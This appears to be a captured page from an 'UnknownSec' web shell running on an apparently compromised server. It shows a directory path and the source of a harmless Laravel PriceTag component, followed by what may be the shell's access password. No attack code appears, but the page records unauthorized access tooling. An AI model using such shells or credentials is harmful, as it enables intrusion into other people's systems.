shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/View/Components/ [ drwxr-xr-x ]

name : PriceTag.php
<?php

namespace App\View\Components;

use Illuminate\View\Component;

class PriceTag extends Component
{
    public $price, $discount;

    public function __construct($price, $discount = null)
    {

        $this->price = $price;
        $this->discount = $discount;
    }


    public function render()
    {
        return view(theme('components.price-tag'));
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password